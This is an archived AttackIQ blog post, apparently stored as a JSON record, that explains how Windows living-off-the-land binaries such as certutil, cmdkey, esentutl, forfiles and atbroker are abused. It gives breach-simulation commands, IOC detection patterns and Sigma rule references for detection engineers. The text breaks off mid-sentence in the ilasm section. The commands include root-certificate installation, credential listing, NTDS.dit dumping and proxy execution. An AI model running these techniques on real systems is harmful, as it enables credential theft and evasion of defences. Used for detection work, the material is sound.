{
	"id": "d106440f-7731-4784-b69b-c6f26583386d",
	"created_at": "2026-04-06T00:06:58.917532Z",
	"updated_at": "2026-04-10T13:12:34.189301Z",
	"deleted_at": null,
	"sha1_hash": "ddb9d132d9af5d74f0fb6b8cd6c3f8f829fdca55",
	"title": "Monitoring and Testing for Living-Off-the-Land Binaries - AttackIQ",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 14383305,
	"plain_text": "Monitoring and Testing for Living-Off-the-Land Binaries - AttackIQ\r\nBy Federico Quattrin\r\nPublished: 2023-03-16 · Archived: 2026-04-05 13:00:49 UTC\r\nSpecifically, LOLBins, or Living-Off-the-Land Binaries, are binaries local to the operating system and traditionally seen as non-malicious, but can be exploited beyond their supposed function by adversaries to accomplish their malicious goals. The day-to-day commonality of LOLBins inadvertently serves as a pseudo cloak of invisibility, allowing the attacker to act inconspicuously across the cyber kill chain and under the nose of SOC teams and intrusion detection tools. On top of this, LOLBins are often fileless, and do not leave the tracks that foreign code or files typically leave behind.\r\nLOLBins pose a growing threat that should not be taken lightly, and leaving them unmonitored is an organizational oversight. To help organizations combat this risk, AttackIQ has released ATT\u0026CK-aligned scenarios to test against LOLBins. Using the AttackIQ Security Optimization Platform, security teams can improve their cybersecurity readiness through continuous testing and security control validation, running assessments aligned to the MITRE ATT\u0026CK framework against the total security program.\r\nIn this post, we have captured a number of LOLBin behaviors to look out for, in hopes that detection engineers and SOC analysts will come to recognize the signs associated with these attacks and have a means for detecting the behaviors. Please note that we have demonstrated the generalized adversary behavior in each example, but be mindful that the adversary may execute a slightly different variation than the ones that we have outlined below. 
In addition, as a Breach and Attack Simulation solution, the steps and commands detailed are how the scenarios would be executed benignly within our platform and under our “do no harm” model.\r\nIf you are interested in exploring other examples of binaries not outlined in this post, more can be found in the LOLBAS project on GitHub, which we used as a reference resource and from which much of our research for these templates is derived.\r\nAtbroker.exe\r\nBinary description\r\nAtbroker.exe is a Microsoft Windows system executable file that stands for “Assistive Technology Manager Broker”. It is a part of the Windows Accessibility features and is responsible for managing the interactions between the Windows operating system and assistive technologies, such as screen readers, magnifiers, and other accessibility tools.\r\nAtbroker.exe is designed to run in the background and starts automatically when a user logs in to Windows. It monitors the accessibility settings and programs that are running on the system, and provides a way for assistive technology applications to interact with the desktop and user interface.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution (T1218)\r\nPrivilege Escalation: Event Triggered Execution: Accessibility Features (T1546.008)\r\nPersistence: Event Triggered Execution: Accessibility Features (T1546.008)\r\nHow do the adversaries use it?\r\nAdversaries can use Atbroker.exe to create a new accessibility feature that is designed to launch a binary such as cmd.exe or malware. 
Once the new accessibility feature is created, the attacker can trigger it and gain access to the command prompt with elevated privileges or execute the binary that was defined.\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 1 of 50\n\nBy using this technique, adversaries can bypass the need for administrative credentials and gain access to sensitive parts of the system.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “atbroker.exe” Script\r\nDescription\r\nAttackIQ has released the scenario “System Binary Proxy Execution using “atbroker.exe” Script”. This scenario will create a new registry key in the “HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs” key.\r\nThe key will have a name composed of the string “AttackIQ_” and 15 random characters.\r\nThe key will contain the following values:\r\n‘ApplicationName’: “@%SystemRoot%\\system32\\AccessibilityCPL.dll,-83”\r\n‘ATExe’: “$pwd\\AIQ_file_creator.exe”\r\n‘CopySettingsToLockedDesktop’: 1\r\n‘Description’: “AIQ key for execution.”\r\n‘Profile’: ‘ ‘\r\n‘SimpleProfile’: “test”\r\n‘StartExe’: “$pwd\\AIQ_file_creator.exe”\r\n‘TerminateOnDesktopSwitch’: 0\r\nWhere the $pwd variable will point to the scenario’s current working directory.\r\nIf the scenario is able to create the keys, it will then execute the following command:\r\nATBroker.exe /start $name\r\nWhere $name is the name of the registry key present in the “HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs” key.\r\nThe binary AIQ_file_creator.exe will create a file in the temp directory.\r\nExecution\r\nScenario IOCs\r\n[(((process:command_line NOT LIKE '%animations%' AND process:command_line NOT LIKE '%audiodescription%' AND process:command_line NOT LIKE '%caretbrowsing%' AND process:command_line NOT LIKE '%caretwidth%' AND process:command_line NOT LIKE '%colorfiltering%' AND process:command_line NOT LIKE '%cursorscheme%' AND process:command_line NOT LIKE '%filterkeys%' AND 
process:command_line NOT LIKE '%focusborderheight%' AND process:command_line NOT LIKE '%focusborderwidth%' AND process:command_line NOT LIKE '%highcontrast%' AND process:command_line NOT LIKE '%keyboardcues%' AND process:command_line NOT LIKE '%keyboardpref%' AND process:command_line NOT LIKE '%magnifierpane%' AND process:command_line NOT LIKE '%messageduration%' AND process:command_line NOT LIKE '%minimumhitradius%' AND process:command_line NOT LIKE '%mousekeys%' AND process:command_line NOT LIKE '%Narrator%' AND process:command_line NOT LIKE '%osk%' AND process:command_line NOT LIKE '%overlappedcontent%' AND process:command_line NOT LIKE '%showsounds%' AND process:command_line NOT LIKE '%soundsentry%' AND process:command_line NOT LIKE '%stickykeys%' AND process:command_line NOT LIKE '%togglekeys%' AND process:command_line NOT LIKE '%windowarranging%' AND process:command_line NOT LIKE '%windowtracking%' AND process:command_line NOT LIKE '%windowtrackingtimeout%' AND process:command_line NOT LIKE '%windowtrackingzorder%')) AND (process:binary_ref.name LIKE '%AtBroker.exe' AND process:command_line LIKE '%start%'))]\r\n[(((process:binary_ref.name != 'C:\\Windows\\system32\\atbroker.exe' OR windows-registry-key:key NOT LIKE '%\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration%' OR windows-registry-key:values[*].data != '(Empty)') AND (process:binary_ref.name NOT LIKE 'C:\\Windows\\Installer\\MSI%' OR windows-registry-key:key NOT LIKE '%Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs%')) AND (windows-registry-key:key LIKE '%Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs%' OR windows-registry-key:key LIKE '%Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration%'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → 
python.exe → powershell.exe → atbroker.exe → AIQ_file_creator.exe\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml\r\n/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml\r\nCertutil.exe\r\nBinary description\r\nCertutil.exe is a command-line utility program that is included with Microsoft Windows operating systems. It is used to manage digital certificates and certificate revocation lists (CRLs) in a Windows environment.\r\nCertutil.exe can be used to perform various tasks related to digital certificates, such as generating and installing certificates, backing up and restoring certificates, verifying and validating certificates, and publishing certificates and CRLs to Active Directory or other network directories.\r\nThis tool is commonly used by system administrators and security professionals to manage the security of a Windows environment, including securing web servers, email servers, and other network services that require the use of digital certificates for authentication and encryption.\r\nTTPs and tactics\r\nDefense Evasion: Subvert Trust Controls: Install Root Certificate (T1553.004)\r\nHow do the adversaries use it?\r\nA malicious actor could use Certutil.exe to install fake or malicious certificates on a Windows system, which could be used to conduct man-in-the-middle attacks, intercept encrypted traffic, or impersonate legitimate websites or services.\r\nAttackIQ Scenarios\r\nInstall Root Certificate using “certutil.exe” Script\r\nDescription\r\nThe scenario will execute the following command:\r\ncertutil.exe -v -addstore -f ROOT aiq_certificate.pem\r\nThe scenario will be marked as Not Prevented if it is capable of adding the certificate.\r\nThis scenario requires administrator privileges.\r\nExecution\r\nScenario 
IOCs\r\n[((process:binary_ref.name LIKE '%\\CertMgr.exe' AND process:command_line LIKE '%/add%' AND process:command_line LIKE '%root%') OR (process:binary_ref.name LIKE '%\\certutil.exe' AND process:command_line LIKE '%-addstore%' AND process:command_line LIKE '%root%'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → certutil.exe\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_root_certificate_installed.yml\r\nCmdkey.exe\r\nBinary description\r\nCmdkey.exe is a built-in Windows command-line tool that allows you to manage and manipulate stored credentials, such as usernames and passwords. It is primarily used to manage credentials for remote connections to other computers, servers, or network resources.\r\nWith cmdkey.exe, you can add, list, modify, and remove stored credentials.\r\nTTPs and tactics\r\nCredential Access: Credentials from Password Stores (T1555)\r\nHow do the adversaries use it?\r\nCmdkey.exe can be used by attackers to access and extract stored credentials on a victim’s machine, which can then be used for lateral movement or privilege escalation.\r\nAttackIQ Scenarios\r\nDiscovery of Cached Credentials using “cmdkey.exe” Command\r\nDescription\r\nThis particular scenario will execute the following command:\r\ncmdkey.exe /list\r\nThe scenario will be marked as Not Prevented if there are cached credentials of the type Domain Password.\r\nExecution\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\cmdkey.exe') AND (process:command_line LIKE '% /l%' OR process:command_line LIKE '% -l%'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → cmdkey.exe\r\nSigma 
Rules\r\n/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml\r\nControl.exe\r\nBinary description\r\nControl.exe is a Windows operating system program that allows users to access and manage various system settings and tools through the Control Panel.\r\nWhen you run control.exe, it opens the Control Panel, which contains various applets for configuring and managing system settings, such as adding or removing hardware, setting up network connections, configuring display settings, and more.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution: Control Panel (T1218.002)\r\nHow do the adversaries use it?\r\nThreat actors could potentially abuse control.exe to execute a DLL by taking advantage of the way that control.exe interacts with Windows and the Control Panel.\r\nControl.exe is designed to open specific applets in the Control Panel based on the name or GUID of the applet that is provided to it as a parameter. However, it is possible to use control.exe to execute a DLL by specifying the path of the DLL as the parameter instead of the name or GUID of an applet.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “control.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\ncontrol.exe AttackIQ_DLL.dll\r\nThe DLL file will create a file in the temp directory when loaded.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented. 
The scenario will be marked as prevented if the file does not exist.\r\nExecution\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\rundll32.exe') AND process:parent_ref.binary_ref.name LIKE '%\\System32\\control.exe')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → control.exe → rundll32.exe\r\nSigma Rules\r\nIn order to detect this scenario you will need to delete the filter in this rule:\r\n/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml\r\nCsc.exe\r\nBinary description\r\ncsc.exe is a command-line tool used to compile C# (C Sharp) source code into executable programs or DLLs (dynamic link libraries). It is included in the Microsoft .NET Framework SDK (Software Development Kit) and can be found in the .NET Framework directory on a Windows computer.\r\nTTPs and tactics\r\nDefense Evasion: Obfuscated Files or Information: Compile After Delivery (T1027.004)\r\nHow do the adversaries use it?\r\nAn attacker can deliver a source code file containing the malicious code to the target system and then use csc.exe to compile the code into an executable file. By compiling the code on the target system, the attacker can avoid detection by security software that may have signatures or behavioral patterns for known malicious executables.\r\nThe use of csc.exe in this context requires that the attacker has already gained access to the target system and has the necessary permissions to execute the compiler. 
Once the code is compiled, the attacker can execute it to achieve their malicious goals, such as stealing sensitive data or taking control of the compromised system.\r\nAttackIQ Scenarios\r\nCompile After Delivery using “csc.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\ncsc.exe -out:aiq_cs_code.exe aiq_cs_code.cs\r\nThe content of aiq_cs_code.cs is:\r\nusing System;\r\nclass Program\r\n{\r\n    static void Main()\r\n    {\r\n        Console.WriteLine(\"AttackIQ binary has been spawned.\");\r\n    }\r\n}\r\nAfter compiling the binary, the scenario will execute the compiled file and search for the message in the stdout.\r\nThe scenario will be marked as Not Prevented if the message “AttackIQ binary has been spawned” is present in the stdout of the compiled binary execution.\r\nExecution\r\nScenario IOCs\r\n[((process:parent_ref.binary_ref.name LIKE '%\\wscript.exe' OR process:parent_ref.binary_ref.name LIKE '%\\cscript.exe' OR process:parent_ref.binary_ref.name LIKE '%\\mshta.exe' OR process:parent_ref.binary_ref.name LIKE '%\\powershell.exe') AND process:binary_ref.name LIKE '%\\csc.exe')]\r\nBinary process tree\r\ncsc.exe will have the following process tree:\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → csc.exe → cvtres.exe\r\nOn the other hand, the compiled binary (aiq_cs_code.exe) will have the following one:\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → aiq_cs_code.exe\r\nSigma Rules\r\nIn order to detect the scenario you will need to add powershell as a parent process to the following rule:\r\n/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml\r\nCscript.exe\r\nBinary description\r\ncscript.exe is a command-line script execution engine in Microsoft Windows operating systems. It is used to execute scripts written in various scripting languages, including VBScript and JScript, and is included as a part of the Windows Script Host (WSH).\r\nTTPs and tactics\r\nExecution: Command and Scripting Interpreter: Visual Basic (T1059.005)\r\nExecution: Command and Scripting Interpreter: JavaScript (T1059.007)\r\nHow do the adversaries use it?\r\nAn adversary could use cscript.exe to run malicious scripts on a target system. This could include scripts designed to steal sensitive information, compromise system security, or carry out other malicious actions.\r\nAttackIQ Scenarios\r\nWindows Cscript Script Execution\r\nDescription\r\nWith this scenario and the FireDrill architecture you have a reliable and secure way to execute your custom tasks when needed. You can upload a script file and decide which interpreter you want to use. Examples of interpreters would be python.exe, cmd.exe, powershell.exe, sh, bash, etc. You can specify the full path of the interpreter; if its location is stored in the asset’s environment you can specify only the name, as shown before. 
Environment variables such as %System% can also be used.\r\nBy using cscript.exe as the interpreter, you can execute either VBScripts or JScripts.\r\nIf the uploaded script uses parameters that have to be sent for its execution, you can specify them as a string in the scenario’s “Parameters” parameter.\r\nIt is possible to upload support files to be used within the script; these files will be located in the current working directory, so the script will only require knowing the filename in order to access them.\r\nThe Supported Platform parameter ensures that the script will only be executed on the selected platform.\r\nThe Script Hash parameter can be specified to enforce that the script file matches a given SHA256 hash (lowercase); the scenario will error and the script will not be executed if the provided hash does not match the script’s hash. No hash validation will be performed if this parameter is not filled.\r\nThere is also a feature that enables executing the script as the logged-in user, instead of executing the script as the SYSTEM user. This feature is available only for Windows agents.\r\nFinally, the scenario success can be defined either by checking the script exit code or by defining a pattern. If a pattern is chosen, the output of the script will be written into a temporary file and the pattern will be searched for inside it. 
The pattern accepts regular expressions.\r\nExecution\r\nIn order to execute this scenario you will need to provide a JScript or VBScript script.\r\nIn this demo example, we have provided the following script:\r\n// This script prints a custom message (a message box under wscript.exe, console output under cscript.exe)\r\nvar message = \"AttackIQ script has been executed.\";\r\nWScript.Echo(message);\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\wscript.exe' OR process:binary_ref.name LIKE '%\\cscript.exe') AND (process:command_line LIKE '%.jse%' OR process:command_line LIKE '%.vbe%' OR process:command_line LIKE '%.js%' OR process:command_line LIKE '%.vba%'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → cscript.exe\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_susp_script_execution.yml\r\nEsentutl.exe\r\nBinary description\r\nEsentutl.exe is a command-line tool used to manage Extensible Storage Engine (ESE) databases in Microsoft Windows operating systems. ESE is a database engine developed by Microsoft that is used by various Microsoft applications, including Active Directory, Exchange Server, Windows Search, and Windows Update.\r\nEsentutl.exe can be used to perform a variety of tasks related to ESE databases, such as creating and repairing databases, compacting and defragmenting databases, and checking the integrity of databases. 
It can also be used to recover data from damaged databases and to export and import data from ESE databases.\r\nTTPs and tactics\r\nCredential Access: Credentials from Password Stores: Credentials from Web Browsers (T1555.003)\r\nCredential Access: OS Credential Dumping: NTDS (T1003.003)\r\nCommand and Control: Ingress Tool Transfer (T1105)\r\nHow do the adversaries use it?\r\nEsentutl.exe could potentially be used by an attacker to:\r\nextract saved login credentials from the Web Cache Files (WCF) of Internet Explorer, which are stored in an ESE database format. An attacker could use the “esentutl.exe” command-line tool to access the ESE database and extract the saved login credentials from the WCF file. The attacker could then use these credentials to gain access to the victim’s online accounts.\r\ndump the contents of the NTDS.dit file on a compromised domain controller. The NTDS.dit file is an ESE database used by Active Directory to store information about user accounts and passwords. An attacker could use the “esentutl.exe” command-line tool to extract password hashes from the NTDS.dit file, which could then be used for offline password cracking or pass-the-hash attacks.\r\ncopy a file into the system.\r\nAttackIQ Scenarios\r\nDump Active Directory Database using Volume Shadow Copy via esentutl.exe\r\nDescription\r\nThis scenario will perform the following actions:\r\nCopy the locked NTDS.dit file by creating a Volume Shadow Copy using esentutl.exe\r\nIf the previous step was successful, dump the SYSTEM registry hive using the reg.exe binary.\r\nIf both the NTDS.dit file and the SYSTEM registry hive are successfully retrieved, the scenario result will be Not Prevented. Otherwise, it will be Prevented.\r\nImportant notes:\r\nFor the scenario to be successful, it must be executed on a Domain Controller. 
Otherwise, the NTDS.dit file won’t be present in the system and the scenario will end with a Requirements not met error.\r\nThis scenario requires esentutl.exe version 10.0. This built-in Windows tool version is present in Windows Server 2016 or newer.\r\nExecution\r\nCopy a file using “esentutl.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nesentutl.exe /y helloworld.exe /d $env:temp\\$name /o\r\nThe scenario will be marked as Not Prevented if the file is copied into the destination path.\r\nExecution\r\nCollect Browser Data via Esentutl using Powershell Script\r\nDescription\r\nThis scenario will execute a PowerShell script that will iterate through each user profile on the system and attempt to flush the data from the WebCache log files back to the WebCacheV01 database using the esentutl utility. Once the data has been flushed, a copy of the database will be made to a temporary directory.\r\nThe scenario’s outcome will be set to Not Prevented if the script is able to flush and make a copy of a user’s WebCache database. The scenario will be set to Prevented if none of the user profiles have an existing database or if the script fails for any reason.\r\nTo execute the scenario correctly, it’s important to make sure that a WebCache database exists for at least one of the user profiles. 
The database is typically locked by Windows if the user for that profile is currently logged in to the system, and the scenario may end with a false prevention.\r\nExecution\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%esentutl.exe' AND windows-registry-key:key LIKE '%System\\CurrentControlSet\\Services\\VSS%') AND (windows-registry-key:key NOT LIKE '%System\\CurrentControlSet\\Services\\VSS\\Start%'))]\r\n[((file:name LIKE '%.exe' OR file:name LIKE '%.dll' OR file:name LIKE '%.ocx' OR file:name LIKE '%.zip' OR file:name LIKE '%.rar' OR file:name LIKE '%.7z' OR file:name LIKE '%.diagcab' OR file:name LIKE '%.appx' OR file:name LIKE '%.ps1' OR file:name LIKE '%.bat' OR file:name LIKE '%.vbs' OR file:name LIKE '%.scf' OR file:name LIKE '%.wsf' OR file:name LIKE '%.wsh') AND (process:binary_ref.name LIKE '%\\esentutl.exe'))]\r\n[((process:binary_ref.name LIKE '%\\esentutl.exe') AND (process:command_line LIKE '%/r%' OR process:command_line LIKE '%-r%') AND process:command_line LIKE '%\\Windows\\WebCache%')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → esentutl.exe\r\nSigma Rules\r\n/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml\r\n/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_exe.yml\r\n/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_archive.yml\r\n/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_script.yml\r\n/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml\r\nExpand.exe\r\nBinary description\r\nexpand.exe is a command-line tool used in Microsoft Windows operating systems to extract files and 
folders from a compressed cabinet (.cab) file. Cabinet files are archives used to store system files, drivers, and other components. The expand.exe utility is included in all versions of Windows, and it can be used to extract individual files, groups of files, or an entire cab file.\r\nTTPs and tactics\r\nCommand and Control: Ingress Tool Transfer (T1105)\r\nHow do the adversaries use it?\r\nexpand.exe could be used to copy a file into the file system.\r\nAttackIQ Scenarios\r\nCopy a file using “expand.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nexpand.exe helloworld.exe $env:temp\\$name\r\nThe scenario will be marked as Not Prevented if the file is copied into the destination path.\r\nExecution\r\nScenario IOCs\r\n[((file:name LIKE '%.exe' OR file:name LIKE '%.dll' OR file:name LIKE '%.ocx' OR file:name LIKE '%.zip' OR file:name LIKE '%.rar' OR file:name LIKE '%.7z' OR file:name LIKE '%.diagcab' OR file:name LIKE '%.appx' OR file:name LIKE '%.ps1' OR file:name LIKE '%.bat' OR file:name LIKE '%.vbs' OR file:name LIKE '%.scf' OR file:name LIKE '%.wsf' OR file:name LIKE '%.wsh') AND (process:binary_ref.name LIKE '%\\expand.exe'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → expand.exe\r\nSigma Rules\r\nThe following rules should be modified by uncommenting the “- \\expand.exe” entry:\r\n/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_exe.yml\r\n/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_archive.yml\r\n/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_script.yml\r\nExtrac32.exe\r\nBinary description\r\nExtrac32.exe is a command-line tool included with Microsoft Windows operating systems. 
It is used to extract files from Microsoft Cabinet (.cab) files. Cabinet files are a type of archive file that is commonly used for distributing software updates, drivers, and other types of system files.\r\nTTPs and tactics\r\nCommand and Control: Ingress Tool Transfer (T1105)\r\nHow do the adversaries use it?\r\nextrac32.exe could be used to copy a file into the file system.\r\nAttackIQ Scenarios\r\nDescription\r\nThis scenario will execute the following command:\r\nextrac32.exe /C helloworld.exe $env:temp\\$name\r\nThe scenario will be marked as Not Prevented if the file is copied into the destination path.\r\nExecution\r\nScenario IOCs\r\n[((file:name LIKE '%.exe' OR file:name LIKE '%.dll' OR file:name LIKE '%.ocx' OR file:name LIKE '%.zip' OR file:name LIKE '%.rar' OR file:name LIKE '%.7z' OR file:name LIKE '%.diagcab' OR file:name LIKE '%.appx' OR file:name LIKE '%.ps1' OR file:name LIKE '%.bat' OR file:name LIKE '%.vbs' OR file:name LIKE '%.scf' OR file:name LIKE '%.wsf' OR file:name LIKE '%.wsh') AND (process:binary_ref.name LIKE '%\\extrac32.exe'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → extrac32.exe\r\nSigma Rules\r\nAdd extrac32.exe to the following rules:\r\n/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_exe.yml\r\n/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_archive.yml\r\n/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_script.yml\r\nForfiles.exe\r\nBinary description\r\nforfiles.exe is a computer software utility for Microsoft Windows, which selects files and runs a command on them. File selection criteria include name and last modified date. The command specifier supports some special syntax options. 
It can be used directly on the command-line, or in batch files or other scripts.\r\nTTPs and tactics\r\nDefense Evasion: Indirect Command Execution (T1202)\r\nHow do the adversaries use it?\r\nForfiles can be used to subvert controls and possibly conceal command execution by not directly invoking cmd.\r\nAttackIQ Scenarios\r\nIndirect Command Execution through “forfiles.exe” Command\r\nDescription\r\nThe scenario executes the following command:\r\npowershell.exe forfiles /p c:\\windows\\system32 /m notepad.exe /c $pwd\\AIQ_pid_binary.exe\r\nWhere AIQ_pid_binary.exe is a binary that will print a message and its process id.\r\nThe scenario will be marked as not prevented if the pattern “AttackIQ binary has been spawned” is present in the stdout.\r\nExecution\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\forfiles.exe') AND (process:command_line LIKE '% /c %' OR process:command_line LIKE '% -c %') AND (process:command_line LIKE '% /m %' OR process:command_line LIKE '% -m %') AND (process:command_line LIKE '% /p %' OR process:command_line LIKE '% -p %'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → forfiles.exe → AIQ_pid_binary.exe\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml\r\nFtp.exe\r\nBinary description\r\nftp.exe is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP).\r\nTTPs and tactics\r\nHow do the adversaries use it?\r\nAdversaries can use it to transfer other tools onto a system, execute commands, or exfiltrate data.\r\nAttackIQ Scenarios\r\nIndirect Command Execution through “forfiles.exe” Command\r\nDescription\r\nThis 
particular scenario involves downloading a text file containing commands to be run with ftp.exe and also downloading\r\na custom binary that, when executed, sends data to the standard output. The scenario then executes these commands using\r\nthe following command:\r\nftp.exe -s:ftpcommands.txt\r\nThe scenario will be marked as not prevented if the pattern “AttackIQ binary has been spawned” is present in the stdout.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[(((process:binary_ref.name LIKE '%\\ftp.exe') AND process:command_line LIKE '%-s:%') OR\r\nprocess:parent_ref.binary_ref.name LIKE '%\\ftp.exe')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → ftp.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml\r\nBack to Top\r\nIe4uinit.exe\r\nBinary description\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 18 of 50\n\nie4uinit.exe is a Windows system file that is used to initialize some of the settings for Internet Explorer. 
Specifically, it is responsible for configuring user-specific settings related to Internet Explorer, such as browser history, default browser settings, and other related settings.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution (T1218)\r\nHow do the adversaries use it?\r\nWhen ie4uinit is called with the parameter -Base-Settings it will load a .inf file called ie4uinit.inf that should be present in the same working directory as ie4uinit.exe.\r\nAn adversary could copy this binary into a custom working directory and then call it so that it loads a custom .INF file.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “ie4uinit.exe” Script\r\nDescription\r\nIn this scenario, the following actions will take place:\r\nThe ie4uinit.exe file will be copied from the System32 folder to the working directory where supporting files are stored.\r\nThe ie4uinit.exe binary will be called with the ‘-Base-Settings’ parameter.\r\nA 5-second wait period will occur.\r\nThe system will check for the presence of the attackiq_ie4uinit.txt file in the working directory. If it is present, the scenario has been successful. If not, the scenario will be marked as prevented.\r\nClean-up procedures will be carried out.\r\nExecution\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\ie4uinit.exe'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → ie4uinit.exe\r\nSigma Rules\r\nIn order to detect the scenario you will need to delete the filter_missing field in the following rule:\r\n/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml\r\nIlasm.exe\r\nBinary description\r\nIlasm.exe is a command-line utility that is part of the Microsoft .NET Framework software development kit (SDK).
It is used to compile Microsoft Intermediate Language (MSIL) code into executable files or dynamic-link libraries (DLLs). MSIL is a low-level programming language that is used by the .NET Framework. It is similar to assembly language and is designed to be platform-independent. MSIL code is compiled by the .NET just-in-time (JIT) compiler at runtime into native machine code that can be executed by the computer’s processor.\r\nIlasm.exe can be used to create MSIL code from source code written in any .NET-supported programming language, such as C# or Visual Basic .NET. The resulting MSIL code can then be compiled into an executable file or DLL using ilasm.exe.\r\nTTPs and tactics\r\nDefense Evasion: Obfuscated Files or Information: Compile After Delivery (T1027.004)\r\nHow do the adversaries use it?\r\nAn attacker can deliver a source code file containing the malicious code to the target system and then use ilasm.exe to compile the code into an executable file. By compiling the code on the target system, the attacker can avoid detection by security software that may have signatures or behavioral patterns for known malicious executables.\r\nThe use of ilasm.exe in this context requires that the attacker has already gained access to the target system and has the necessary permissions to execute the compiler.
Once the code is compiled, the attacker can execute it to achieve their malicious goals, such as stealing sensitive data or taking control of the compromised system.\r\nAttackIQ Scenarios\r\nCompile After Delivery using “ilasm.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nilasm.exe aiq_il_code.txt /exe\r\nThe content of aiq_il_code.txt is:\r\n.assembly extern mscorlib { .publickeytoken = (B7 7A 5C 56 19 34 E0 89 ) .ver 4:0:0:0 }\r\n.assembly hello {\r\n.custom instance void [mscorlib]System.Runtime.CompilerServices.CompilationRelaxationsAttribute::.ctor(int32) = ( 01 00 08 00 00 00 00 00 )\r\n.custom instance void [mscorlib]System.Runtime.CompilerServices.RuntimeCompatibilityAttribute::.ctor() = ( 01 00 01 00 54 02 16 57 72 61 70 4E 6F 6E 45 78 63 65 70 74 69 6F 6E 54 68 72 6F 77 73 01 )\r\n.hash algorithm 0x00008004\r\n.ver 0:0:0:0\r\n}\r\n.module hello.exe\r\n.class private auto ansi beforefieldinit Program extends [mscorlib]System.Object {\r\n.method private static void Main() cil managed {\r\n.entrypoint\r\n.custom instance void [mscorlib]System.STAThreadAttribute::.ctor() = ( 01 00 00 00 )\r\n.maxstack 8\r\nIL_0000: nop\r\nIL_0001: ldstr \"AttackIQ binary has been spawned.\"\r\nIL_0006: call void [mscorlib]System.Console::WriteLine(string)\r\nIL_000b: nop\r\nIL_000c: ret\r\n}\r\n}\r\nAfter compiling the binary, the scenario will execute the compiled file and search for the message “AttackIQ binary has been spawned” in the stdout.\r\nExecution\r\nScenario IOCs\r\n[(process:binary_ref.name LIKE '%\\ilasm.exe')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → ilasm.exe\r\nThe compiled binary (aiq_il_code.exe), on the other hand, will have the following one:\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) 